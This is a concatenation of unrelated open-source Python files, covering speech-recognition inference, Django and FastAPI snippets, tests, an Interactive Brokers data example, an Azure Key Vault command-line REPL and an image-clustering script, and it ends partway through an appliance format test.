searcher = LAS_Searcher(model, config.max_token_length, bos_id, eos_id, model_config.pad_id)
elif isinstance(model, DeepSpeech2):
searcher = DeepSpeechSearcher(model, model_config.blank_index)
# Inference
logger.info("Start Inference")
outputs = []
for batch_input in dataset:
if args.beam_size > 0:
batch_output = searcher.beam_search(batch_input, args.beam_size)
batch_output = batch_output[0][:, 0, :].numpy()
else:
batch_output = searcher.greedy_search(batch_input)[0].numpy()
outputs.extend(batch_output)
outputs = [tokenizer.detokenize(output).numpy().decode("UTF8") for output in outputs]
logger.info("Ended Inference, Start to save...")
# Save file
with open(args.output_path, "w") as fout:
wtr = csv.writer(fout, delimiter="\t")
wtr.writerow(["AudioPath", "DecodedSentence"])
for audio_path, decoded_sentence in zip(dataset_files, outputs):
wtr.writerow((audio_path, decoded_sentence))
logger.info(f"Saved (audio path,decoded sentence) pairs to {args.output_path}")
if __name__ == "__main__":
sys.exit(main(parser.parse_args()))
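# A minimal example invocation (paths are placeholders); the flags correspond to
# the argparse options defined above, and the relative imports mean the script
# is run as a module:
#
#   python -m speech_recognition.run.inference \
#       --data-config configs/data.yml \
#       --model-config configs/las.yml \
#       --audio-files "data/*.pcm" \
#       --model-path checkpoints/model-10 \
#       --sp-model-path resources/sp.model \
#       --output-path output.tsv --beam-size 5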
| 5,002 |
src/notes_app/forms.py
|
oussamabouchikhi/Notize
| 1 |
2169705
|
from django import forms
from .models import Note
from ckeditor.widgets import CKEditorWidget
class NoteForm(forms.ModelForm):
content = forms.CharField(widget=CKEditorWidget())
class Meta:
model = Note
fields = ['title', 'content', 'tags']
| 266 |
{{cookiecutter.project_slug}}/backend/app/app/api/api_v1/endpoints/utils.py
|
tonyf/full-stack-fastapi-postgresql
| 0 |
2169738
|
from typing import Any
from fastapi import APIRouter, Depends
from pydantic.networks import EmailStr
from app import models, schemas
from app.api import deps
from app.core.celery_app import celery_app
from app.utils import send_test_email
router = APIRouter()
@router.post("/test-celery/", response_model=schemas.Msg, status_code=201)
def test_celery(
msg: schemas.Msg,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Test Celery worker.
"""
celery_app.send_task("app.worker.test_celery", args=[msg.msg])
return {"msg": "Word received"}
@router.post("/test-email/", response_model=schemas.Msg, status_code=201)
def test_email(
email_to: EmailStr,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Test emails.
"""
send_test_email(email_to=email_to)
return {"msg": f"Test email sent to {email_to}"}
@router.post("/test/sentry", response_model=schemas.Msg, status_code=500)
def test_sentry(
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
raise Exception("Test Exception")
@router.post("/test/posthog", response_model=schemas.Msg, status_code=200)
def test_posthog(
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
from app.services.posthog import PosthogClient
posthog = PosthogClient().get_client()
posthog.capture("test-id", "test-event")
return {"msg": f"Test event created"}
| 1,517 |
restfulpy/tests/test_validation_filter.py
|
maryayi/restfulpy
| 1 |
2169972
|
import copy
import unittest
from nanohttp import context, json, settings
from restfulpy.principal import DummyIdentity
from restfulpy.testing import WebAppTestCase
from restfulpy.tests.helpers import MockupApplication
from restfulpy.validation import validate_form
from restfulpy.controllers import RestController, RootController
class ValidationFilterController(RestController):
@json
@validate_form(
filter_=['filteredParamForAll'],
client=dict(filter_=['filteredParamForClient']),
admin=dict(filter_=['filteredParamForAdmin'])
)
def post(self):
result = copy.deepcopy(context.form)
result.update(context.query_string)
return result
class Root(RootController):
validation = ValidationFilterController()
class ValidationFilterTestCase(WebAppTestCase):
application = MockupApplication('MockupApplication', Root())
@classmethod
def configure_app(cls):
super().configure_app()
settings.merge("""
logging:
loggers:
default:
level: info
""")
def test_validation_filter(self):
# Test `filter`
# role -> All
self.wsgi_app.jwt_token = DummyIdentity().dump().decode()
result, ___ = self.request(
'All', 'POST', '/validation', doc=False,
params={
'customParam': 'param',
'filteredParamForAll': 'param',
'filteredParamForClient': 'param',
'filteredParamForAdmin': 'param',
}
)
self.assertNotIn('customParam', result)
self.assertNotIn('filteredParamForClient', result)
self.assertNotIn('filteredParamForAdmin', result)
self.assertIn('filteredParamForAll', result)
# -----------------------------
# role -> Client
self.wsgi_app.jwt_token = DummyIdentity('client').dump().decode()
result, ___ = self.request(
'Client', 'POST', '/validation', doc=False,
params={
'customParam': 'param',
'filteredParamForAll': 'param',
'filteredParamForClient': 'param',
'filteredParamForAdmin': 'param',
}
)
self.assertNotIn('customParam', result)
self.assertIn('filteredParamForClient', result)
self.assertNotIn('filteredParamForAdmin', result)
self.assertIn('filteredParamForAll', result)
# -----------------------------
# role -> Admin
self.wsgi_app.jwt_token = DummyIdentity('admin').dump().decode()
result, ___ = self.request(
'Admin', 'POST', '/validation', doc=False,
params={
'customParam': 'param',
'filteredParamForAll': 'param',
'filteredParamForClient': 'param',
'filteredParamForAdmin': 'param',
}
)
self.assertNotIn('customParam', result)
self.assertNotIn('filteredParamForClient', result)
self.assertIn('filteredParamForAdmin', result)
self.assertIn('filteredParamForAll', result)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| 3,234 |
hytra/jst/classifiertrainingexampleextractor.py
|
ilastik/hytra
| 1 |
2169758
|
"""
Provide methods to find positive and negative training examples from a hypotheses graph and
a ground truth mapping, in the presence of multiple competing segmentation hypotheses.
"""
import logging
import numpy as np
import attr
from hytra.core.random_forest_classifier import RandomForestClassifier
logger = logging.getLogger(__name__)
def trainDetectionClassifier(
hypothesesGraph,
gtFrameIdToGlobalIdsWithScoresMap,
numSamples=100,
selectedFeatures=None,
):
"""
Finds the given number of training examples, half as positive and half as negative examples, from the
given graph and mapping.
    Positive examples are those with the highest Jaccard score, while negative examples are either
    not the best match for a GT label or not matched at all.
**Returns**: a trained random forest
"""
# create a list of all elements, sort them by their jaccard score, then pick from both ends?
logger.debug("Extracting candidates")
# create helper class for candidates, and store a list of these
@attr.s
class Candidate(object):
"""Helper class to combine a hytpotheses graph `node` and its `score` to find the proper samples for classifier training"""
node = attr.ib()
score = attr.ib(validator=attr.validators.instance_of(float))
candidates = []
nodeTraxelMap = hypothesesGraph.getNodeTraxelMap()
for node in hypothesesGraph.nodeIterator():
if "JaccardScores" in nodeTraxelMap[node].Features and len(nodeTraxelMap[node].Features["JaccardScores"]) > 0:
globalIdsAndScores = nodeTraxelMap[node].Features["JaccardScores"]
globalIdsAndScores = sorted(globalIdsAndScores, key=lambda x: x[1])
bestScore = globalIdsAndScores[-1][1]
candidates.append(Candidate(node, bestScore))
assert len(candidates) >= numSamples
candidates.sort(key=lambda x: x.score)
# pick the first and last numSamples/2, and extract their features?
# use RandomForestClassifier's method "extractFeatureVector"
selectedSamples = candidates[0 : numSamples // 2] + candidates[-numSamples // 2 - 1 : -1]
labels = np.hstack([np.zeros(numSamples // 2), np.ones(numSamples // 2)])
logger.info("Using {} of {} available training examples".format(numSamples, len(candidates)))
# TODO: make sure that the positive examples were all selected in the GT mapping
logger.debug("construct feature matrix")
node = selectedSamples[0].node
if selectedFeatures is None:
        selectedFeatures = list(nodeTraxelMap[node].Features.keys())  # list() so .remove() below works
forbidden = [
"JaccardScores",
"id",
"filename",
"Polygon",
"detProb",
"divProb",
"com",
]
forbidden += [f for f in selectedFeatures if f.count("_") > 0]
for f in forbidden:
if f in selectedFeatures:
selectedFeatures.remove(f)
logger.info("No list of selected features was specified, using {}".format(selectedFeatures))
rf = RandomForestClassifier(selectedFeatures=selectedFeatures)
features = rf.extractFeatureVector(nodeTraxelMap[node].Features, singleObject=True)
featureMatrix = np.zeros([len(selectedSamples), features.shape[1]])
featureMatrix[0, :] = features
for idx, candidate in enumerate(selectedSamples[1:]):
features = rf.extractFeatureVector(nodeTraxelMap[candidate.node].Features, singleObject=True)
featureMatrix[idx + 1, :] = features
rf.train(featureMatrix, labels)
return rf
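# A minimal usage sketch; the hypotheses graph and the ground-truth mapping are
# built elsewhere in hytra, so the variable names below are placeholders:
#
#     rf = trainDetectionClassifier(hypothesesGraph,
#                                   gtFrameIdToGlobalIdsWithScoresMap,
#                                   numSamples=200)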
| 3,595 |
Examples/10_securityAnalysis.py
|
darwinex/darwinex-ibkr
| 2 |
2169263
|
# Installing (source activate ENVIRONMENT):
# Cd to: cd ~/Desktop/Darwinex/darwinex-ibkr/TWS_API/twsapi_macunix.976.01/IBJts/source/pythonclient/
# Do: python3 setup.py bdist_wheel
# Do: python3 -m pip install --user --upgrade dist/ibapi-9.76.1-py3-none-any.whl
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract, ContractDetails
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.execution import Execution, ExecutionFilter
from ibapi.common import BarData
from dataclasses import dataclass, fields, astuple
import pandas as pd
import threading, logging, time
logging.basicConfig(level=logging.INFO,
format='%(asctime)s.%(msecs)03d %(levelname)s <> %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
#######################################
@dataclass
class BarDataNew:
date: str = ''
open: float = 0.0
high: float = 0.0
low: float = 0.0
close: float = 0.0
volume: int = 0
average: float = 0.0
barCount: int = 0
class AlphaApp(EWrapper, EClient):
def __init__(self):
self.logger = logging.getLogger(__name__)
EClient.__init__(self, wrapper=self)
###########################################################
def error(self, reqId: int, errorCode: int, errorString: str):
'''This event is called when there is an error with the
communication or when TWS wants to send a message to the client.'''
self.logger.error(f'reqId: {reqId} / Code: {errorCode} / Error String: {errorString}')
def contractDetails(self, reqId: int, contractDetails: ContractDetails):
'''Receives the full contract's definitions. This method will return all
contracts matching the requested via EEClientSocket::reqContractDetails.'''
self.logger.info(f'contractDetails: {contractDetails}')
def openOrder(self, orderId: int,
contract: Contract,
order: Order,
orderState: OrderState):
'''This function is called to feed in open orders.'''
self.logger.info(f'orderId: {orderId} / contract: {contract} / order: {order} / orderState: {orderState}')
def orderStatus(self, orderId: int,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float):
'''This event is called whenever the status of an order changes. It is
also fired after reconnecting to TWS if the client has any open orders.'''
self.logger.info(f'orderId: {orderId} / status: {status} / filled: {filled} / remaining: {remaining} / avgFillPrice: {avgFillPrice} / clientId: {clientId}')
def execDetails(self, reqId: int,
contract: Contract,
execution: Execution):
'''This event is fired when the reqExecutions() functions is
invoked, or when an order is filled.'''
self.logger.info(f'contract: {contract} / execution: {execution}')
def position(self, account: str,
contract: Contract,
position: float,
avgCost: float):
'''This event returns real-time positions for all accounts in
response to the reqPositions() method.'''
self.logger.info(f'contract: {contract} / position: {position} / avgCost: {avgCost}')
def accountSummary(self, reqId: int,
account: str,
tag: str,
value: str,
currency: str):
'''Returns the data from the TWS Account Window Summary tab in
response to reqAccountSummary().'''
self.logger.info(f'reqId: {reqId} / account: {account} / tag: {tag} / value: {value} / currency: {currency}')
def historicalData(self, reqId: int,
bar: BarData):
'''Returns the requested historical data bars.
reqId - the request's identifier
        date - the bar's date and time (either as a yyyymmdd hh:mm:ss formatted
               string or as system time according to the request)
open - the bar's open point
high - the bar's high point
low - the bar's low point
close - the bar's closing point
volume - the bar's traded volume if available
count - the number of trades during the bar's timespan (only available
for TRADES).
WAP - the bar's Weighted Average Price
hasGaps -indicates if the data has gaps or not.'''
self.logger.info(f'reqId: {reqId} / bar: {bar}')
self.historicalDataContainer.append(BarDataNew(**bar.__dict__))
def historicalDataEnd(self, reqId:int,
start:str,
end:str):
'''Marks the ending of the historical bars reception.'''
self.logger.info(f'reqId: {reqId} / start: {start} / end: {end}')
# Print the data:
df = self._convertDataToDataFrame(self.historicalDataContainer)
self.logger.info(df)
# Make some calculations:
self.makeSomeCalculations(df)
def _convertDataToDataFrame(self, data: list) -> pd.DataFrame:
dataContainerList = data
dataStructure = dataContainerList[0]
df = pd.DataFrame.from_records(astuple(o) for o in dataContainerList)
df.columns = [field.name for field in fields(dataStructure)]
df = df.set_index('date', drop=True)
return df
def makeSomeCalculations(self, df: pd.DataFrame):
# Calculate returns based on the close:
df['Returns'] = df.close.pct_change()
# Calculate some indicators:
from ta.volatility import BollingerBands # pip install --upgrade ta
# Initialize Bollinger Bands Indicator
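        # NOTE: the n/ndev keyword names match older releases of the `ta` package;
        # newer releases appear to call these parameters window/window_dev instead.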
BBBands = BollingerBands(close=df.close, n=20, ndev=2)
# Add Bollinger Bands features
df['bb_bbm'] = BBBands.bollinger_mavg()
df['bb_bbh'] = BBBands.bollinger_hband()
df['bb_bbl'] = BBBands.bollinger_lband()
self.logger.info(df)
###########################################################
def nextValidId(self, orderId: int):
'''Receives next valid order id from TWS.'''
self._nextValidOrderId = orderId
self.logger.info(f'¡Connected!')
self.logger.info(f'NextValidOrderId: {orderId}')
a = threading.active_count()
self.logger.info(f'Thread count for reference: {a}')
# Call client method:
self.reqCurrentTime()
# Get historical data:
# Request contract data:
nvidiaStock = self.createUSStockContract('NVDA', primaryExchange='NASDAQ')
self.historicalDataContainer = []
self.reqHistoricalData(reqId=self.getNextValidId(),
contract=nvidiaStock,
endDateTime='20200903 18:00:00',
durationStr='5 D',
barSizeSetting='30 mins',
whatToShow='BID',
useRTH=0,
formatDate=1,
keepUpToDate=False,
chartOptions=[])
def getNextValidId(self) -> int:
'''Get new request ID by incrementing previous one.'''
newId = self._nextValidOrderId
self._nextValidOrderId += 1
self.logger.info(f'NextValidOrderId: {newId}')
return newId
###########################################################
def createUSStockContract(self, symbol: str, primaryExchange: str):
'''Create a US Stock contract placeholder.'''
contract = Contract()
contract.symbol = symbol
contract.secType = 'STK'
contract.exchange = 'SMART'
contract.currency = 'USD'
contract.primaryExchange = primaryExchange
self.logger.info(f'Contract: {contract}')
return contract
def createFXPairContract(self, pair: str):
'''Create a FX pair contract placeholder.
Pair has to be an FX pair in the format EURUSD, GBPUSD...'''
# Separate currency and symbol:
assert len(pair) == 6
symbol = pair[:3]
currency = pair[3:]
contract = Contract()
contract.symbol = symbol
contract.secType = 'CASH'
contract.exchange = 'IDEALPRO'
contract.currency = currency
self.logger.info(f'Contract: {contract}')
return contract
def createMarketOrder(self, action: str, totalQuantity: int):
'''Create a market order.'''
order = Order()
order.action = action
order.orderType = 'MKT'
order.totalQuantity = totalQuantity
self.logger.info(f'Order: {order}')
return order
def createStopOrder(self, action: str, totalQuantity: int, stopPrice: float):
        '''Create a stop order.'''
order = Order()
order.action = action
order.orderType = 'STP'
order.totalQuantity = totalQuantity
order.auxPrice = stopPrice
self.logger.info(f'Order: {order}')
return order
if __name__ == "__main__":
app = AlphaApp()
app.connect('127.0.0.1', port=7497, clientId=123)
app.run()
| 9,814 |
net/sandbox.keyvault/python/repl/key_vault_repl.py
|
schaabs/sandbox
| 0 |
2169702
|
#!/usr/local/bin/python
from azure.mgmt.keyvault.models import Sku
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters, VaultProperties, SkuName, AccessPolicyEntry, \
Permissions, KeyPermissions, SecretPermissions, CertificatePermissions
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication
from azure.keyvault.models import JsonWebKeyType
from azure.mgmt.keyvault import KeyVaultManagementClient
import json
import os
import sys
from key_vault_config import KeyVaultConfig
from key_vault_auth import KeyVaultAuth
CLIENT_ID = '8fd4d3c4-efea-49aa-b1de-2c33c22da56e' # Azure cli
CLIENT_OID = '8694d835-b4e2-419a-a315-b13c854166e2'
CLIENT_TENANT_ID = 'a7fc734e-9961-43ce-b4de-21b8b38403ba'
def _json_format(obj):
return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))
class KV_Repl(object):
_repl_break_commands = set(('back', 'b'))
_repl_quit_commands = set(('quit', 'q'))
def __init__(self, config):
self._auth = KeyVaultAuth(config, CLIENT_ID)
self._config = config
self._mgmt_client = KeyVaultManagementClient(self._auth.get_arm_creds(), config.subscription_id)
self._data_client = KeyVaultClient(self._auth.get_keyvault_creds())
self._selected_vault = None
self._current_index = None
def start(self):
try:
            self._vault_index_loop()
except SystemExit:
print('\nuser exited\n')
def _continue_repl(self, display_action, break_commands=()):
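        # Renders the menu via display_action, then reads a selection: returns None on a
        # break command, exits the process on a quit command, otherwise returns the
        # selection (converted to int when it is numeric).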
display_action()
self._selection = input('> ').lower()
if self._selection in break_commands:
return None
elif self._selection in KV_Repl._repl_quit_commands:
sys.exit()
try:
self._selection = int(self._selection)
except ValueError:
pass
return self._selection
def _display_vault_index(self):
print('\nAvailable Vaults:\n')
self._current_index = self._get_vault_list()
for idx, vault in enumerate(self._current_index):
print('%d. %s' % (idx, vault.name))
print('\n#:select | (a)dd | (d)elete | (q)uit')
def _vault_index_loop(self):
while self._continue_repl(self._display_vault_index) is not None:
vaults = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(vaults):
self._selected_vault = self._mgmt_client.vaults.get(self._config.resource_group, vaults[i].name)
self._vault_detail_loop()
else:
print('invalid vault index')
elif self._selection == 'a' or self._selection == 'add':
self._add_vault()
else:
print('invalid input')
def _add_vault(self):
name = input('\nenter vault name:')
all_perms = Permissions()
all_perms.keys = [KeyPermissions.all]
all_perms.secrets = [SecretPermissions.all]
all_perms.certificates = [CertificatePermissions.all]
user_policy = AccessPolicyEntry(self._config.tenant_id, self._config.user_oid, all_perms)
app_policy = AccessPolicyEntry(CLIENT_TENANT_ID, CLIENT_OID, all_perms)
access_policies = [user_policy, app_policy]
properties = VaultProperties(self._config.tenant_id, Sku(name='standard'), access_policies)
properties.enabled_for_deployment = True
properties.enabled_for_disk_encryption = True
properties.enabled_for_template_deployment = True
vault = VaultCreateOrUpdateParameters(self._config.location, properties)
self._mgmt_client.vaults.create_or_update(self._config.resource_group, name, vault)
print('vault %s created\n' % name)
def _display_selected_vault_detail(self):
print('\nName:\t%s' % self._selected_vault.name)
print('Uri:\t%s' % self._selected_vault.properties.vault_uri)
print('Id:\t%s' % self._selected_vault.id)
print('\n(s)ecrets | (k)eys | (c)ertificates | (e)ncrypt | (d)ecrypt | (b)ack | (q)uit\n')
def _vault_detail_loop(self):
while self._continue_repl(self._display_selected_vault_detail, break_commands=KV_Repl._repl_break_commands) is not None:
if self._selection == 's' or self._selection == 'secrets':
self._secret_index_loop()
elif self._selection == 'k' or self._selection == 'keys':
self._key_index_loop()
elif self._selection == 'c' or self._selection == 'certificates':
print('\nnot yet implemented\n')
elif self._selection == 'e' or self._selection == 'encrypt':
self._encrypt_file()
else:
print('invalid input')
def _encrypt_file(self):
while True:
inpath = input('input file: ')
if os.path.isfile(inpath):
break
else:
print('error: file not found')
        while True:
            outpath = input('output file: ')
            if outpath:
                break
        # encrypting the file contents is not implemented in this snippet
        print('\nnot yet implemented\n')
    @staticmethod
    def _prompt_for_file_path(prompt, verify_exists):
        while True:
            inpath = input(prompt)
            if not verify_exists or os.path.isfile(inpath):
                return inpath
def _display_secret_index(self):
self._current_index = []
secret_iter = self._data_client.get_secrets(self._selected_vault.properties.vault_uri)
if secret_iter is not None:
try:
self._current_index = [secret for secret in secret_iter]
except TypeError:
pass
print('\n%s Secrets:\n' % self._selected_vault.name)
for idx, s in enumerate(self._current_index):
print('%d. %s' % (idx, KV_Repl._get_name_from_url(s.id)))
print('\n#:show secret value (a)dd (d)elete (b)ack (q)uit\n')
def _secret_index_loop(self):
while self._continue_repl(self._display_secret_index, break_commands=KV_Repl._repl_break_commands) is not None:
secrets = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(secrets):
                    print('\n%s = %s\n' % (KV_Repl._get_name_from_url(secrets[i].id), self._data_client.get_secret(secrets[i].id).value))
else:
print('invalid secret index')
elif self._selection == 'a' or self._selection == 'add':
self._add_secret()
elif self._selection == 'd' or self._selection == 'delete':
print('\nnot yet implemented\n')
def _add_secret(self):
secret_name = input('\nSecret Name: ')
secret_value = input('Secret Value: ')
self._data_client.set_secret(self._selected_vault.properties.vault_uri, secret_name, secret_value)
print('\nSecret %s added to vault %s' % (secret_name, self._selected_vault.name))
def _display_key_index(self):
self._current_index = []
key_iter = self._data_client.get_keys(self._selected_vault.properties.vault_uri)
if key_iter is not None:
try:
self._current_index = [secret for secret in key_iter]
except TypeError:
print('warning: caught TypeError')
pass
print('\n%s Keys:\n' % self._selected_vault.name)
for idx, k in enumerate(self._current_index):
print('%d. %s' % (idx, KV_Repl._get_name_from_url(k.kid)))
print('\n#:get key | (a)dd | (i)mport | (d)elete | (b)ack | (q)uit\n')
def _key_index_loop(self):
while self._continue_repl(self._display_key_index, break_commands=KV_Repl._repl_break_commands) is not None:
keys = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(keys):
                    print('\n%s = %s\n' % (KV_Repl._get_name_from_url(keys[i].kid), keys[i].kid))
else:
print('invalid key index')
elif self._selection == 'a' or self._selection == 'add':
self._add_key()
elif self._selection == 'd' or self._selection == 'delete':
print('\nnot yet implemented\n')
def _add_key(self):
key_name = input('\nKey Name: ')
self._data_client.create_key(self._selected_vault.properties.vault_uri, key_name, kty=JsonWebKeyType.rsa.value)
        print('\nKey %s added to vault %s' % (key_name, self._selected_vault.name))
@staticmethod
def _get_name_from_url(url):
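        # Returns the last path segment, e.g. 'https://myvault.vault.azure.net/secrets/mysecret' -> 'mysecret'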
split = url.split('/')
return split[len(split) - 1]
def _get_vault_list(self):
vault_list = [vault for vault in self._mgmt_client.vaults.list()]
return vault_list
config = KeyVaultConfig()
config.from_disk()
repl = KV_Repl(config)
repl.start()
config.to_disk()
| 8,973 |
main.py
|
agb91/ImageRecognitionClusterisation
| 1 |
2168628
|
# -*- coding: cp1252 -*-
import os
from downloadImage import Download
from sqlQuery import sqlQuery
from accessoCartella import accessoCartella
from clusterizzaKMeans import clusterizzaKMeans
from clusterizzaBinario import clusterizzaBinario
from clusterizzaDBScan import clusterizzaDBScan
class Main:
def main(self):
        # Data for accessing and using the DB and tables
host="127.0.0.1"
user='root'
password=''
dbName="imageRecognize" # Nome del database
mainTable="mainTable"
inputTable="inputTable"
clustTable="clustTable"
imm="imm"
mn=Main()
mySql = sqlQuery()
imageFolder=accessoCartella()
        mySql.createDB(host, user, password, dbName) # Creates the database if it does not exist
        conn = mySql.connectMySql(host, user, password, dbName) # Opens the connection to the database
if(conn!=None):
            #*********************** TABLE CREATION ****************************
mySql.createMainTable(conn, mainTable)
mySql.createClustTable(conn, clustTable)
            mySql.createInputTable(conn, inputTable) # This one should not be created from here but from the interface
            "insertInputTable and updateInputTable are only needed as long as the Web interface is missing"
            #toSearch="fish" # Word to search for
            #numImm=30 # How many images to download
            #deleteSearch=0 # 0 - delete nothing (default); 1 - delete all previous information for a given search!
            #deleteAll=0 # 0 - delete nothing (default); 1 - delete the database with that name and delete all the images in the folder at path
            #algoritmo1=1 # Use Sift 0-NO, 1-YES
            #algoritmo2=1 # Use Shape 0-NO, 1-YES
            #algoritmo3=1 # Use Orb 0-NO, 1-YES
            #selezionaClust=0 # 0: default DBScan, 1: KMeans, 2: Binary!
            #numClassi=5 # number of classes
            #mySql.insertInputTable(conn, inputTable, toSearch, numImm, deleteSearch, deleteAll, selezionaClust, algoritmo1, algoritmo2, algoritmo3, numClassi) # Inserts if the table has just been created
            #mySql.updateInputTable(conn, inputTable, toSearch, numImm, deleteSearch, deleteAll, selezionaClust, algoritmo1, algoritmo2, algoritmo3, numClassi) # Updates
            # ********************************** READING DATA FROM THE INPUT TABLE **********************************************************************
            dataClust=mySql.readInputParams(conn, inputTable) # dataClust contains the data to pass as input to clusterizza, as returned by cursor.fetchAll
arrayDataClust=mn.fetchAllToArray(dataClust)
            dataSearch=mySql.readInputDownload(conn, inputTable) # dataSearch contains the data to pass as input to Download and to the various queries (where needed), as returned by cursor.fetchAll
arrayDataSearch=mn.fetchAllToArray(dataSearch)
            # Assign the input data
            toSearchDownload=arrayDataSearch[0] # The word we will use to download the images, exactly as it arrives from the web interface
            toSearch=toSearchDownload.replace(' ','_') # The word we will use for all database operations and for creating the folders!
            numImm=arrayDataSearch[1] # Number of images to download
            deleteSearch=arrayDataSearch[2] # 0 - delete nothing (default); 1 - delete all previous information for a given search!
            deleteAll = arrayDataSearch[3] # 0 - delete nothing (default); 1 - delete the rows corresponding to toSearch from mainTable and clustTable, and delete all the images in the folder at path (AP method)
selezionaClust=arrayDataSearch[4]
            PATH = os.path.abspath(os.path.join(imm, toSearch)) # PATH of the folder containing the images downloaded for the word toSearchDownload
            pathImm = os.path.abspath(imm) # Path of the imm folder
            print("\n\n ********************* READING INPUT DATA ************************* \n")
            mySql.deleteAllClustTable(conn, clustTable) # On every run, empty the clustTable
if(deleteAll>0):
mySql.deleteAllMainTable(conn, mainTable)
mySql.deleteAllClustTable(conn, clustTable)
imageFolder.cancella(pathImm)
print ("\n ************** CANCELLATO TUTTO ***************** \n")
elif(deleteSearch>0 and ((len(imageFolder.leggi(PATH))>0) or len(mySql.selectObjectMainTable(conn, mainTable, toSearch)))):
imageFolder.cancella(PATH)
mySql.deleteRowMainTable(conn, mainTable, toSearch)
print ("\n ************** CANCELLA RICERCA PRECEDENTE ***************** \n")
            # Create the imm/toSearch folder
            if not os.path.exists(PATH):
                os.makedirs(PATH)
            # If the search is not in the main table, insert it with googleIndex = 0
            mySql.insertMainTable(conn, mainTable, toSearch, numImm, 0, PATH)
            # If the folder contains fewer images than the number to download, download the remaining ones
if(len(imageFolder.leggi(PATH))<numImm):
googleIndexArray=mn.fetchAllToArray(mySql.selectGoogleIndexMainTable(conn, mainTable, toSearch))
googleIndex=googleIndexArray[0]
scarica=Download()
googleIndex=scarica.go(toSearch, PATH, numImm, googleIndex)
mySql.updateGoogleIndexNumImmMainTable(conn, mainTable, toSearch, len(imageFolder.leggi(PATH)), googleIndex)
print ("\n\n *************************** FINE DOWNLOAD ********************************* \n\n")
"""
Se il numero di immagini nella cartella è maggiore del numero di immagini
da scaricare quando il numero di immagini da scaricare è diverso da 0
allora cancella gli elementi in eccesso!
"""
vet=imageFolder.leggi(PATH)
if(len(vet)>numImm and numImm!=0):
googleIndexArray=mn.fetchAllToArray(mySql.selectGoogleIndexMainTable(conn, mainTable, toSearch))
googleIndex=googleIndexArray[0]
googleIndex=googleIndexArray[0] - (len(vet)-numImm)
for i in range(numImm, len(vet)):
imageFolder.cancellaFile(PATH, vet[i]);
print ("\n\n ****************** IMMAGINI IN PIU' CANCELLATE *************************** \n\n")
mySql.updateGoogleIndexNumImmMainTable(conn, mainTable, toSearch, len(imageFolder.leggi(PATH)), googleIndex)
            # Insert into the clustTable
vet=imageFolder.leggi(PATH)
if((len(vet)>0)):
for i in range (0, len(vet)):
mySql.insertInClustTable(conn, clustTable, toSearch, vet[i], '0.00','0')
#vet=imageFolder.leggi(PATH)
if (len(vet)!=0):
if(selezionaClust==0):
print("\n\n ***************** CLUSTERIZZAZIONE : DBScan *********************** \n")
cl=clusterizzaDBScan()
elif (selezionaClust==1):
print("\n\n ***************** CLUSTERIZZAZIONE : KMeans *********************** \n")
cl=clusterizzaKMeans()
else:
print("\n\n **************** CLUSTERIZZAZIONE : Binario *********************** \n")
cl=clusterizzaBinario()
allVectors=cl.clusterizza(arrayDataClust, PATH)
                #allVectors contains at position: 0 - vector of image names; 1 - vector of Rank values; 2 - vector of classifications
                print("\n\n **************************** CLUSTERING FINISHED *********************** \n")
if allVectors!=None:
for i in range(0, len(allVectors[0])):
mySql.updateClustTable(conn, clustTable, toSearch, allVectors[0][i], allVectors[1][i], allVectors[2][i])
else:
print("Non ci sono immagini nella cartella!")
conn.close()
"Metodo per scrivere i riulstati dati da cursor.fetchall in un array"
def fetchAllToArray(self, fetchall):
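        # Flattens a cursor.fetchall() result into a single list,
        # e.g. [('fish', 30), (0,)] -> ['fish', 30, 0] (hypothetical values).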
array=[]
for row in fetchall:
for i in range(0,len(row)):
array.append(row[i])
                print(str(i) + "- " + str(row[i]))
return array
mn=Main()
mn.main()
| 7,956 |
setup.py
|
jscheiber22/ethereum-api
| 0 |
2169508
|
from setuptools import setup, find_packages
setup(
name='ethereum-api',
version='0.1.2',
license='MIT',
description='A library to more easily work with the Ethermine pool network API.',
author='<NAME>',
author_email='<EMAIL>',
url="https://github.com/jscheiber22/ethereum-api",
packages=find_packages(include=['ethereum', 'ethereum.*'])
)
| 372 |
tests/test_format_ini.py
|
patlegu/python-SNS-API
| 9 |
2169912
|
#!/usr/bin/python
import os
import sys
import unittest
import re
from stormshield.sns.sslclient import SSLClient
APPLIANCE = os.getenv('APPLIANCE', "")
PASSWORD = os.getenv('PASSWORD', "")
@unittest.skipIf(APPLIANCE=="", "APPLIANCE env var must be set to the ip/hostname of a running SNS appliance")
@unittest.skipIf(PASSWORD=="", "PASSWORD env var must be set to the firewall password")
class TestFormatIni(unittest.TestCase):
""" Test INI format """
def setUp(self):
self.client = SSLClient(host=APPLIANCE, user='admin', password=PASSWORD, sslverifyhost=False)
self.maxDiff = 5000
def tearDown(self):
self.client.disconnect()
def test_raw(self):
""" raw format """
expected_re = """101 code=00a01000 msg="Begin" format="raw"
AUTH.*
CHPWD.*
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('HELP')
self.assertTrue(re.match(expected_re, response.output, re.MULTILINE|re.DOTALL))
self.assertEqual(response.ret, 100)
def test_section(self):
""" section format """
expected = """101 code=00a01000 msg="Begin" format="section"
[Global]
State=0
RiskHalfLife=21600
RiskTTL=86400
[Alarm]
Minor=2
Major=10
[Sandboxing]
Suspicious=2
Malicious=50
Failed=0
[Antivirus]
Infected=100
Unknown=2
Failed=0
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG HOSTREP SHOW')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
def test_section_line(self):
""" section_line format """
expected="""101 code=00a01000 msg="Begin" format="section_line"
[Result]
id=pvm_detailed type=pvm name="Detailed Vulnerability Mail"
